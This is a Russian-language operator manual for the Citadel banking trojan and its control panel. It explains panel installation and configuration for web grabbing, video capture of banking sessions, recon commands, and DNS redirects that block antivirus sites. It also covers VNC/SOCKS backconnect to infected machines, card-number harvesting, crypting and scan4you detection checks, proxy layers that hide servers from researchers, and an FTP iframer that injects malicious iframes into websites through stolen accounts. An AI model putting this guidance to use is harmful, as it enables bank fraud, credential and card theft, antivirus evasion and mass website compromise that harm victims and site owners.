define('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Вставляем этот ключ сюда, т.е получается
define('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
По умолчанию данный ключ будет уже вписан в админку, поэтому, вам остается только проверить его.
Заливаем скрипты из папки webserver на сервер и расставляем права по схеме ниже:
Потом ставим chmod 777 на папку:
system
system/data
system/cron
files/
files/webinjects
Также, необходимо поставить перед установкой chmod 777 на всю папку webserver, после полной установки - вернуть права папки на chmod 755
После этих проделанных действий, открываем файлик webserver/api.php
и меняем строчку define('API_TOKEN_KEY', 'JHGuw3e76&^%&$gf232ghfgh%^$%^$%');
на любой произвольный пароль, к примеру define('API_TOKEN_KEY', 'dgwd23gwegw');
Это нужно чтоб вы были защищены от взлома и вас не скомпрометировали через скрипт API, поменяйте дефлотовый пароль.
Также, в целях безопасности, имеет смысл переименовать скрипт cp.php (это файл управления админкой) и gate.php (гейт)
Файл file.php переименовывать нельзя!
********************
>>>>>>>>>> в) Шаг 2 [Дополнительная защита админки]
********************
Заходим на http://www.htaccesstools.com/htpasswd-generator/
Вводим желаемое имя-пароль, выдается строчка типа a:$apr1$HE/llFvK$u3YAEGm277SkotywpTl9w/
Сохраняем эту строчку в файл .htpasswd в директории webserver
После чего создаем новый файл .htaccess в директории webserver
Туда пишем:
<Files cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile /put/do/faila/.htpasswd
require valid-user
</Files>
Где /put/do/faila/.htpasswd - заменяем на свой конечный unix-путь.
Теперь при заходе на админку cp.php, будет дополнительная защита по паре логин-пароль.
Можно сделать по-другому и не создавать .htpasswd, а просто создать файл .htaccess и вписать туда строчки:
<Files cp.php>
Order Deny,Allow
Deny from all
Allow from 111.111.106.111
</Files>
Где 111.111.106.111 - ваш постоянный IP, теперь админка будет доступна только с вашего IP.
Какой из способов вам удобнее - выбирать вам.
********************
>>>>>>>>>> г) Шаг 3 [Разбор конфига]
********************
Откроем файл config.txt и рассмотрим НОВЫЕ настройки, старые настройки унаследованные от зевса остались неизменными, поэтому не будем заострять на них внимание. Если вы не пользовались зевсом, качайте паблик-релизы зевса и изучайте настройки самостоятельно. Продукт уже расчитан на то, что вы пользовались ранее Zeus'ом.
entry "Video"
quality 1
length 60
end
Секция для настроек видеограббера: length длина каждого видео в секундах, рекомендуется указывать не более 10 минут (600 секунд) т.к образуются весьма увесистые файлы.
Quality - от 1 до 5, качество видео. Рекомендуется оставить 1 по умолчанию, чтобы сэкономить на размере видео файлов.
Видео запись срабатывает при заходе на нужный нам линк и снимается ровно length-секунд.
Чтобы задать нужные нам маски для съемки, переходим в раздел entry "WebFilters"
"#*paypal.com/*"

символ # перед маской является символом активацией съемки.

Секция очень тонкая, потому что довольно сильно нагружает сервер файлами, указывайте как можно точную маску и только на очень нужные вам ссылки(к примеру банк.акки)
Рекомендуется настроить сервер apache & php - для приема файлов более 50 MB через POST.
Руководство по настройке сервера лежит здесь# http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Тестируйте внимательно съемку видео НЕ на виртуальних машинах, т.к в связи с отсутствием нужных кодеков, может быть такое, что на виртуалках не будет сниматься видео.
Видео складываются в формате .webm, в папку _reports/*BOTNAME*/videos/
Их можно найти через поиск файлов в админке, либо просмотреть через онлайн плеер (раздел "Просмотр Видео"). Рекомендуется просматривать в браузере Opera и Firefox, остальные браузеры не тестировались.
entry "CmdList"
"hostname"
"net view"
"ipconfig /all"
end

Список системных команд, который бот исполнит при первом запуске на системе и пошлет в админку.
В админке, можно найти результат команд как тип отчета "Результат CMD-команды"
С ним будет список: бот - результат выполнения команды
в удобном формате (Раздел CMD-Парсер)
encryption_key "key"
Обязательно здесь задаем свой произвольный ключ, это RC4 ключ он же Encryption Key - вы его задаете при установке админки в инсталлере, поменять его можно в разделе Параметры. Он должен быть не слишком сложный и не слишком простой, совпадать в конфиге и в админке. НЕ РЕКОМЕНДУЕТСЯ СТАВИТЬ БОЛЕЕ 10 СИМВОЛОВ! ИСПОЛЬЗОВАТЬ ТОЛЬКОНИЖНИЙ РЕГИСТР И БЕЗ СПЕЦСИМВОЛОВ!

entry "DnsFilters"
"microsoft.com=127.0.0.1"
"myspace.com=127.0.0.1"
"gruposantander.es=127.0.0.1"
end
Возможность создать DNS-редирект или заблокировать AV-сервер или нежелательный урл(например, если вы обнаружили, что в логах загрузки идут еще кому-то и нужно заблокировать чей-то гейт).
Указывается IP-адрес для редиректа.
ДНС Редирект работает не только для браузеров, а для всего софта, который будет стучаться на данный домен. Все эти запросы будут перенаправлены на другой IP.
Маску можно задавать точную, либо использовать звездочки (*) для обозначения примерной маски, например:
entry "DnsFilters"
*bitdefender.com*=209.85.229.104
*download.bitdefender.com*=209.85.229.104
end
После того, как вы отредактировали конфиг под свои параметры, нажмите кнопу собрать конфиг, собрать бота и создать модули.
Кнопка собрать бота отвечает за генерацию ехе-файла и считывает параметры из секции StaticConfig
Кнопка собрать конфиг отвечает за генерацию файла с инжектами, а также секцию DynamicConfig.
Кнопка собрать модули создает файл видео.модуля и файл модуля граббинга кукисов Firefox.
Такие модули как: MiniAv,Cardswipe встроены в ехе-файл и не создают каких-либо дополнительных файлов.
Все полученые файлы необходимо закачать в директорию webserver/files
Не забудьте закриптовать ехе-файл перед тем как поместить его в папку, иначе будет такое, что по таймеру автообновления, боты начнут скачивать ехе, который палится.
Видео.модуль закачивать обязательно, даже если вы им не пользуетесь. Также, вы можете не закачивать ехе-файл если не хотите автообновления exe через параметр timer_autoupdate.
url_config1 "http://localhost/file.php|file=test_config.bin"
Указываем здесь test_config.bin - название нашего конфига, который мы залили в папку files/ с учетом того, что указываем также путь до file.php (а лежит он выше папки files). Символ | вас не должен смущать, он тут специально.
Расширение конфига может быть любое.

url_config1 указывать обязательно, можно также вписать несколько резервных конфиг-урлов на случай если какой-то из цепи доменов, в момент запуска ехе не работает, т.к боты не отстучаться в вашу админку, если не смогут скачать основной конфиг.
В этом случае пишем еще одну строчку под url_config1:

url_config2 "http://localhost/file.php|file=test_config.bin"
Указывать не обязательно. Но таких можно указывать до 3 резервных конфигов, бот поочередно будет стучаться на каждый из урлов пока не установит себе конфиг-файл. На самый последний url_config бот стучит с задержкой, через 5 часов, это сделано для защиты от автоматического парсинга урлов реверсерами.
Обратите внимание, что задача этих параметр не резервность, а подстраховка, на случай если в момент ПЕРВОГО запуска ехе билда, какой-то из трех доменов недоступен. Для резервности существует отдельная секция ниже "AdvancedConfigs"


url_loader "http://localhost/file.php|file=test_bot.exe"
test_bot.exe - здесь указываем название ехе-файла, который лежит в папке files/
Файл file.php не переименовываем, оставляем с таким же именем. Указываем путь дo file.php.

url_server "http://localhost/gate.php"
Здесь указываем путь до гейта - gate.php
Остальное настраивается как зевс, если забыли формат, читайте мануал от зевса zeus_old.txt

После того, как мы закачали файлы в files и залили всю папку в целом webserver + создали БД.
Идем по адресу: http://www.vash-host.com/webserver/install
Название папки webserver можно переименовывать на произвольное.
И вписываем все значения (БД, пароли, RC4 ключ) после чего удаляем каталог install.



********************************************************************************
==========================>>>>> 4. Установка BackConnect Windows сервера (VNC модуль)
********************************************************************************
Для установки серверной части, нужен Windows VPS/Dedicated желательно XP,2003,2008
Ставим веб-сервер XAMPP/WAMP/Apache c поддержкой PHP. Отключаем UAC+Windows Firewall, чтобы можно было открывать порты. А также отключим политику доменов и выйдем полностью из любого домена.
Заливаем в веб-директорию комплект скриптов backconnect\winserv_php_gate
Веб-админка коннектора будет по адресу: http://ip-serv/control.html
В ней будет лог по VNC/Backconnect Socks коннектам.
Возможные проблемы: из-за Windows фаерволла, проверьте этот момент очень внимательно. Не забудьте перезагрузить Windows после отключения фаерволла.
Все скрипты должны лежать в корне на сервере, никаких папок не создавать.
Если не знаете как поставить Apache с PHP, вот мануал: http://www.ripecms.com/documentation/articles/installing-apache-php
********************************************************************************
==========================>>>>> 5. Установка Citadel VNC Admin Interface
********************************************************************************
Если вы приобрели модуль VNC-админки, то в вашей панели будет доступен раздел "VNC".
Пробежимся по опциям, с которыми могут возникнуть трудности.
Для начала работы нужно нажать "Конфигурация" и вписать туда IP-адрес Windows-сервера, куда вы уже залили скрипты backconnect'a. Никаких путей не надо, просто IP-адрес.
Чем отличается коннект от автоконнект?
Если вы задаете коннект какому-то боту, то он разово выполнит эту команду и вышлет вам данные для подключения. Если вы задаете автоконнект, то бот будет инициировать соединение с backconnect-сервером каждый раз, как только он выходит в интернет. Опция применима как к Backconnect Socks, так и к VNC.
Теперь зададим URL-маски, которые мы будем отлавливать в нашу VNC админку, если есть в этом потребность.
Маска URL: здесь указываем URL по схеме *mail.ru* или http://*.bank.com* (можно играться как угодно, звездочка вам в помощь)
Параметры: Здесь указываем названия POST-переменных, которые находятся на форме сайта, который мы ловим. На примере mail.ru, это будет Login* и Password*
Формат параметров простой, можно указать "login=", можно указать "login*", или просто "login". Поэтому выбирайте как вам удобнее, не забудьте протестировать маску.
Параметры не чувствительны к регистру.
Уведомлять в Jabber?: ставим опцию, если хотим чтобы каждый новый отловленный акк, приходил вам. Jabber задается в настройках, можно указать несколько через запятую.
ВАЖНО! Чтобы в разделе "Параметры" были вписаны данные Jabber-бота(Использовать исключительно Jabber.org или Jabber.ru), с которого все это будет идти к вам.
Также, есть возможность создания Автоконнекта с ботом, от которого пришел новый аккаунт в раздел. Т.е в жабер вам сразу приходит аккаунт + порт для коннекта на VNC/SOCKS.
Не забывайте, что работает контекстное меню напротив ботов, линков и т.п через правую кнопку мыши: можно удалить какие-то ненужные акки(отправить в мусор), пометить как Избранное или включить/отключить нужные настройки.
Пример таблицы статистики:
2 ботов, 6 аккаунтов, 5 живых аккаунтов (83%) расчитывает % живых аккаунтов по принципу если бот не появлялся в сети более 4 дней, аккаунт считается мертвым.
Также, существует API для быстрого создания VNC/SOCKS соединения с нужным ботом, например во время перехвата токена или смс, вам нужно срочно зайти на акк под холдером, вы инжектом через javascript/iframe вызываете URL до api.php
* VNCController
* api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=VNC
* api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=SOCKS
* api.php/<token>/vnc/connect?botId=WIN-ABC123&protocol=VNC
*/
define('API_TOKEN_KEY', 'changethispassword');
И передаете IP или BotID, скрипт дает команду на установку соединения боту и данные приходят вам в жаббер. Тайминг зависит от параметра timer_stats в конфиге билдера.
Вот вам совет по работе с ботами на Win7/Vista: используйте Firefox portable для Win7/Vista - он работает корректно. Не забываем отключать wallpaper чтобы не гонять много трафика. Также, чтобы попасть в одну из директорий - нажимаем свойства ярлыка.
Для подключения к ботам, вы должны скачать себе любой VNC-клиент, например UltraVNC(http://www.uvnc.com/downloads/ultravnc.html)
Потом указать в подключении IP-адрес Windows сервера (коннектора) и порт-сессии бота, который написан в админке или в jabber-уведомлении.
********************************************************************************
==========================>>>>> 6. Установка модуля чекинга веб-соксов
********************************************************************************
Раздел "SOCKS" в админке - ничего настраивать не нужно.
********************************************************************************
==========================>>>>> 7. Установка модуля парсера логов
********************************************************************************
Модуль представляет из себя раздел "Ссылки".
Для того, чтобы создать структуру из ссылок, необходимо нажать кнопку "Парсить новые отчеты" перед началом работы с модулем. Если модуль зависает из-за большой нагрузки или большого количества данных, рекомендуется временно убрать гейт с сервера, чтобы не забивать базу, а по окончанию работы, вернуть гейт обратно (gate.php)
********************************************************************************
==========================>>>>> 8. Установка модуля CardSwipe
********************************************************************************
Модуль зашит в ехе-файл, настройка осуществляется через конфиг-файл. Есть 2 опции в StaticConfig
enable_luhn10_get 1
enable_luhn10_post 1
Первый параметр: GET LUHN10 - анализирует данные в GET-запросах и WinSocket/Wininet на предмет карт и дампов, по алгоритму en.wikipedia.org/wiki/Luhn_algorithm
POST LUHN10 - анализирует POST данные в https:// запросах.
По традиции, все важные данные присутствуют только в POST-запросах.
Чтобы найти карты, выберите тип отчета: "LUHN10 запрос" в разделе "Поиск в базе данных" в админке.

********************************************************************************
==========================>>>>> 9. Работа с крипт-панелью
********************************************************************************
Существует раздел "crypt exe" он же "крипт ехе" и отображается он в админке Citadel. Если его нету, то читайте ниже как его активировать.
Он нужен для того, чтобы вы могли предоставить доступ вашему криптеру и он переодически перезаливал ехе-файл, который боты скачивают и обновляют.
При этом, криптер не имеет доступа к остальным частям админки, для него доступен только этот раздел.
Для начала, активируем этот раздел у себя, для этого перейдем в раздел "Users", нажмем на свой логин и ниже отобразится список опций, доступный нам. Отмечаем 2 пункта:
r_svc_crypter_crypt - Этот пункт дает привилегии перезаливать ехе файл.
r_svc_crypter_pay - Этот пункт дает привилегии вести таблицу оплат по перезаливкам.
Далее создаем нового пользователя и даем ему ТОЛЬКО "r_svc_crypter_crypt" права, передаем логин-пароль криптеру и он может через форму перезаливать ехе-файлы из папки files/
Не забудьте предварительно поставить chmod 777 на эту папку и доверять доступ только доверенным лицам.
Теперь, как только криптер перезаливает ехе-файл, появляется новая запись в таблице что данный ехе-файл не оплачен, вы же в свою очередь проверив все ли ок, помечаете у себя в админке что крипт Х такого-то числа оплачен.
Можно вписать данные для Jabber-уведомления по проверке scan4you в этом же разделе.

********************************************************************************
==========================>>>>> 10. Установка системы проксирования (прокладка для конфига, кнопка "собрать прокладку")
********************************************************************************
Прокладка существет, чтобы скрывать от трекеров реальный путь до файлов конфига и ехе.
Т.к file.php из папки webserver, отвечает за выдачу файлов конфига и ехе ботам, то мы можем перенести эту систему на любой FTP-хост(прокладка) и использовать для скрытия реальных путей.
Прокладка не поможет скрыть путь до гейта, для гейта есть отдельный скрипт-проксификатор в папкe other.
Единственный недостаток проксификатора гейта: он не передает видео файлы на ваш сервер.
Заметим, что file.php из папки webserver, не имеет ничего общего и более того НЕ СОВМЕСТИМ с file.php, который генерирует кнопка "собрать прокладку". Эту кнопку нужно нажимать только тогда, когда ваш конфиг полностью настроен.
Генерация прокладки для защиты конфигов от трекеров(полноценная система редиректов) BETA-версия.
Генератор прокладки решает проблему переноса file.php на отдельный хост, который вы можете юзать как редирект-прокладку до вашего основного файла конфига и ехе, чтобы при анализе вашего ехе, реверсеры и трекеры выложили
Генерация прокладки осуществляется через билдер, для этого добавлена кнопка "Build the bot file-proxy"/"Собрать прокладку".
На выходе получаем 2 файла, file.php, file_config.php (названия файлов не менять)
ВНИМАНИЕ: file_config.php содержит ваш encryption key в преобразованном виде, он берется из вашего конфига, поэтому при генерации гейта конфиг должен быть настроенным и рабочим.
Теперь загружаем файлы file_config,php, file.php на прокладку и создаем там же папку files, куда помещаем exe, config + файлы модулей.
Для запрета прямого доступа к файлам в папке files создаем файл .htaccess следующего содержания:
deny from all
В настройках конфига задаем url_config1, url_loader до прокладки.
Если хотите защитить гейт и создать для него прокладку, есть файлик other/redir.php, открываем его и прописываем путь до РЕАЛЬНОГО гейта
//URL оригинального сервера.
$url = "http://localhost/s.php";

После чего сохраняем срипт под любым именем и указываем в конфиге бота путь в качестве гейта (url_server)
!Важно! Чтобы на хосте были разрешены сокеты в PHP, иначе работать не будет.
Проверить это можно создав файл 1.php с <?php phpinfo(); ?>
Он должен показывать Sockets Support enabled
Прокладки на данный момент не передают видео и скриншоты, только логи.
********************************************************************************
==========================>>>>> 11. Краткий мануал по новым фичам админки
********************************************************************************
1) В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически.
=> Для начала нажмем кнопку Настройки: впишем туда Scan4you Profile ID(ИМЕННO ID, НЕ ЛОГИН!!), Scan4you API Token, Jabber для уведомлений. Взять эти данные можно в настройках профиля scan4you.net
Потом идете в раздел ПАРАМЕТРЫ и вписываете данные Jabber-бота (предварительно зарегав аккаунт для бота), рекомендуется юзать jabber.org т.к с другими серверами возможны проблемы из-за несовместимости протокола.
Все готово.
2) Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 encryption_key ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 45%, ваши боты будут иметь самый свежий и чистый билд.
Путь до ехе-файла берется из секции "url_loader", соответственно чем чаще вы перезаливаете чистый ехе, тем чище ехе-файл имеют ваши боты у себя. Они его скачивают и перезапускают, обновляя себя.
Если у вас попрежнему проблема с тем, что лишь малая часть ботов обновляется на новый ехе, значит вероятная проблема в том, что эвристика или антивирус палит ваш новый ехе и не дает запустить его.

3) Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Firefox/Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Многие из вас используют АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео на любом хосте, не заходя в админку.

4) Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
Отдельный раздел "CMD Парсер".
5) Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться ;)
Раздел "Установленный Софт", если вы видите в графиках много "Unknown" значит на боте не стоит антивируса или фаерволла. Также, нажав поиск отчетов по боту, вы увидите новый вид отчета.
6) Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом в разделе "Избранные отчеты"
Также, можно добавить бота в избранное, без отчетов. Кнопка "Make Favourite"
7) В разделе "Поиск в базе данных" появилась возможность подключения других Citadel БД с логами("Соединение с другой БД").
Например, если у вас имеются старые админки с логами, вы можете подключить их и работать с ними.
Работа осуществляется только на уровне поиска данных по логам, других возможностей, таких как VNC, комментарии - нету.
Для подключения жмем "Настройка" и вписываем данные MySQL-базы, потом выбираем ее и нажимаем кнопку Connect.
По завершению работы с другой базой, снова подключаем основную базу чтобы не запутаться.
Подключение другой базы никак не влияет на работоспособность всей системы.
8) В разделе "Поиск в базе данных" появилась 2 новых пункта: "Стоп-слова:" и "Маски URL:"
Первый позволяет исключать мусорные ссылки из выдачи после поиска, например если вы ищите кейворд "bank" и вам попадается ссылка постоянно "bankofbooks.com" вводите ее и она не будет показываться после поиска, также можно сохранить алиасы (alias) чтобы не вводить этот кейворд каждый раз.
"Маски URL:" - позволяет настроить более тонкий поиск и увеличить скорость поиска данных. Здесь мы ищем только по ссылкам, а не по содержимому.

********************************************************************************
==========================>>>>> 12. Работа с API (api.php)
********************************************************************************
Работа с API.php. Через API можно выдернуть ftp-аккунты для любого FTP-ифреймера.
* IFramerController:
* api.php/<token>/iframer/ftpList
* api.php/<token>/iframer/ftpList?state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all&plaintext=1

Через API можно отправить Jabber-сообщения(например встроив линк в инжекты), api считает параметры jabber-бота из соответствующего раздела в админке, а также считает всех получателей в разделе Jabber Notifier.

* JabberController:
* api.php/<token>/jabber/send?message=Hello%20world!

Через API можно получить статус ботов (online/offline)
* BotsController
* api.php/<token>/bots/online?botId[]=A-BOT&botId[]=B-BOT&...


=> Мануал по экспортеру видео-файлов для админок АЗ на основе онлайн-плеера.
Запросы такого вида:
/api.php/megakey/video/list.php?botnet=COOL&botIP=111.111.111.111
/api.php/megakey/video/list.php?botnet=COOL&botId=017_B4DF7611E03FF4C8
в ответ выдают php-массивы или JSON
Формат запросов:
api.php/<security-token>/video/<action>[.<extension>]?<params>
<security-token> параметр-ключ, который вы задаете в скрипте api.php и он нужен для авторизации на сервере.
<action> — команда
<extension> — (опционально) расширение: формат вывода. Если опустить — виден дебаг-вывод. Возвожные значения: .dump, .php, .json, .xml
<params> — параметры функции контроллера (можно посмотреть в коде)
Примеры запросов:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1
http://citadelhost/folder/api.php/ahro4uNg/video/embed?botnet=COOL&botId=WIN-ABC123&video=balakhan.webm
Параметр botnet не обязателен.
citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
И еще: подставив расширение — можно получить желаемый формат:
http://citadelhost/folder/api.php/ahro4uNg/video/list.php?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list.json?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list.xml?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
Добавив параметр &embed=1 можно получить сразу HTML-код вставки для всех видеофайлов, но не рекомендую: их может быть много) там для этого отдельная функция есть.
Пример без передачи имени ботнета:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1

За остальными примерами работы с API, смотрите в комментариях к скрипту api.php
********************************************************************************
==========================>>>>> 13. Как обновлять админку и бота на следущие версии Citadel
********************************************************************************
Перезалейте и перезапишите все скрипты на сервере с нового архива и зайдите в папку /install/, нажав кнопку Update - ждите пока ваши таблицы обновятся, это может занять долгое время. Данные не потеряются.
Если у вас слишком забита БД, вам имеет смысл поставить админку заново в новую папку и перебросить на нее ботов командой user_execute http://www.host.com/newcitadel.exe
Обратите внимание, формат конфига с каждой новой версией может меняться, поэтому для того чтобы все работало корректно, настройте НОВЫЙ(идущий в архиве с версией) конфиг под ваши параметры и перезалейте его в папку files, вместе с exe-файлом и модулями. Обращайте внимание на новые появившиеся опции в конфиг-файле, который мы даем вместе с билдером.
После чего, для того, чтобы ваши боты обновились на новую версию, дайте команду user_execute http://www.temphost.com/newcitadel.exe
Проверьте, что ехе доступен с веба по данному линку.
********************************************************************************
==========================>>>>> 14. Описание опций в конфиге билдера
********************************************************************************
disable_cookies 1/0 - Если стоит 1, cookies не будут присылаться вам в админку и .sol файлы НЕ будут удалены с ПК холдера. Если поставить 0, все .sol файлы будут стерты и cookies будут отсылаться к вам на админку.
disable_antivirus 1/0 - Если стоит 1, модуль MiniAV будет выключен.
enable_luhn10_get 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в GET запросе. МОДУЛЬ ВШИТ В ЕХЕ-ФАЙЛ!
enable_luhn10_post 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в POST запросе. МОДУЛЬ ВШИТ В ЕХЕ-ФАЙЛ!
remove_certs 1 - Если стоит 1, сертификаты слаться не будут.
timer_autoupdate 8 - Время в часах, автообновления ехе из папки files/. Иначе говоря через сколько часов, скачивать и запускать ехе каждый раз.
disable_httpgrabber 1 - Если стоит 1, отключается граббер HTTP отчетов и на сервер идут только HTTPS отчеты со всех браузеров.
report_software 1 - Если стоит 1, отсылать информацию о фаерволле/антивирусе/софте в админку.
use_module_ffcookie 1 - Если стоит 1, то будет генерироваться модуль экспорта кукисов в Firefox, при запуске билда, кукисы будут отправлены в админку в удобном формате.

Секция entry "WebFilters"
Для активации скриншотов, вставляем мачку "@*paypal.com/*"
Если нужны скриншоты полного экрана, то "@@*paypal.com/*"
Для активации видео-записи, "#*paypal.com/*"

Подсекция
entry HttpVipUrls
"*facebook.com/*"
end

Позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1). Т.е если вам нужны только HTTPS:// логи, но имеется пара-тройка http:// ссылок, которые вы хотите видеть в логах, то здесь вы указываете такие ссылки по схеме выше, без указания протокола, т.е просто название домена *bankofamerica.com*

entry "WebFakes" - ВЕБФЕЙКИ НЕ РАБОТАЮТ!! Но раздел не удалять.

********************************************************************************
==========================>>>>> 15. FTP-ифреймер. Характеристика и настройка
********************************************************************************
A) Скрипт ифреймера
Заливается на левый сайт и используется как "прокладка": осуществляет всю работу. Нажмите "Скачать скрипт" и залейте его по фтп на какой-нибудь левый хост.
Им управляет специальная cron-задача из вашей админки.
Возможности отладки:
* Создать рядом со скриптом папку iframer/ доступную на запись. Туда он может сохранять предпросмотр ифрейминга файлов.
* Создать рядом со скриптом файл 'iframer.php.log' (имя скрипта с расширением + .log): он туда автоматически начнёт писать логи действий, найденные папки, ...
* Не забудьте выставить права 666,777 если хотите отладку сделать.
Скачать его можно на странице ифреймера в панельке: [download].
Физически он лежит в system/utils/. Здесь он напрямую не вызывается, просто хранится :)
Сам ифреймер для работы не требует никаких файлов и прав записи: он аккуратно использует PHP-сессии для хранения даннях.
B) Конфигурация
Позволяет задать:
* URL скрипта-ифреймера для запуска.
* HTML-код для вставки
* Режим действия. 'off' выключен, 'inject' вставлять HTML-код, 'preview' предпросмотр без изменения файлов на FTP: сохранять проифреймленные файлы в папку 'iframed/' рядом со скриптом (если она существует и доступна на запись)
* Метод инъекции: умный(не повреждает PHP/JS/ASP файлы) , запись в конец, перезапись
* Глубина обхода папок (уровни от 1 до 50)
* Маски для файлов и папок.
Файл ифреймится только в том случае если и папка, и файл подошли к одной из масок.
Если папка совпала с маской — глубина обхода увеличивается (на случай глубоко заложенного public_html)
C) Принцип работы клиентской части
Во-первых, перед каждой фазой общения панельки с ифреймером последний проходит самотестирование: все ли жизненноважные для работы функции включены, предсказуемо ли ведёт себя сервер, .... Если selftest не выполнен — никакая работа выполняться не будет.

Один cronjob раз в 10 минут собирает новые ftp-аккаунты из базы и создаёт задания. Повторные ftp-акки не допускаются.
Эти аккаунты постятся на скрипт-ифреймер и добавляются к списку "заданий" вне зависимости от того запущен он сейчас или нет.

Другой cronjob также выполняется раз в 10 минут. Он просто запускает скрипт-ифреймер: если он всё ещё работает — ничего не происходит, однако если он там сдох (например, time limit) — будет произведён перезапуск. Порог перезапуска 120сек

И, наконец, последний cronjob: он каждую минуту спрашивает ифреймер как у него там дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.

Во избежание возможных ошибок вся передача данных двухэтапная: запрос, ответ, запрос-подтверждение, действие.
Если в течение суток по аккаунту нет результатов — он отправляется снова.
D) Принцип работы самого ифреймера
В начале скрипта указан список игнорируемых расширений файлов. Они не изменяются даже если подошли к одной из масок.
Ифреймер хранит данные в сессии: они включены на всех хостингах и нет нужды играться с правами или искать папку доступную для записи :) Написан с учётом возможной работы даже под PHP4.

Ифреймер умеет правильно перезапускаться и дохнуть по timelimit'у: никакие важные данные не потеряются, он сможет продолжить с места остановки.
При разрыве подключения ифреймер умеет реконнектиться при следующем запуске.

Фазы работы:
1. Попытка коннекта. Если она не удаётся 3 раза подряд — акк отмечается как невалидный.
Если много акков к которым не удаётся подключиться — ифреймер может "подвисать" сгребая таймауты. Это нормально: он пытается :)
2. Попытка аутентификации. Если не удаётся — акк невалидный.
3. Листинг всех папок и файлов до указанной глубины. Выборка файлов и папок подходящих по маске указанной в админке. Для подошедших папок глубина обхода увеличивается.
4. Фаза ифрейминга. Замечу, что в режиме 'preview' файлы на FTP не изменяются!
Для каждого файла определяется его тип (по расширению), что определяет метод ифрейминга. Поддерживаются: html, php, CSS, JS, asp (и эквивалентные расширения)
К коду ифрейма добавляется специальный маркер для избежания случайного повторного ифрейминга файла.
В режиме smart код добавляется в начало php-файла, однако сам ифрейм выводится в конце :)
В режиме append код добавляется в конец файлов. Умно определяется синтаксис чтобы не сломать код. JS-файлы заражаются через внедрение кода рисующего iframe.
* На всех этапах собирается статистика, список изменённых файлов.

Ифреймером управляют два задания:
* "запуск" отрабатывает автоматом каждые 10 минут: он постит новые аккаунты и включает долгий процесс их проверки.
* "сбор" — каждую минуту, забирает что готово
E) Интерфейс
Показывает состояние ифреймера (на самом деле, состояние cron-задач). Можно вручную дёрнуть задание чтобы обновить информацию.
Показывает список аккаунтов. Для каждого: Состояние, ошибки, список страниц (по клику), статистика (по клику).
Невалидные аккаунты удаляются через сутки: повисели и пропали.

*) Принцип работы заданий и ифреймера на пальцах:

Задание "запуск": раз в 10 минут
Получить несколько новых акков и дописать их в конец списка задач.
Дальше ифреймер проходит по списку задач (аккаунтов)
Берём 1й акк. Коннектим. Не получилось в течение 10сек? Отложим, перепроверим.
Берём 2й. Подключилось! Авторизация зато не удалась. С этим закончили, он невалидный.
Берём 3й. Не коннектит. Тоже перепроверим.
Берём 4й. Подключились. Авторизовались. Парсим.. ифреймим.. закончили, он валидный.
Задание "сбор":
оно в ЛЮБОЙ момент может подключиться и выхватить промежуточные результаты) Здесь это 2й и 4й, если они успели отработать.
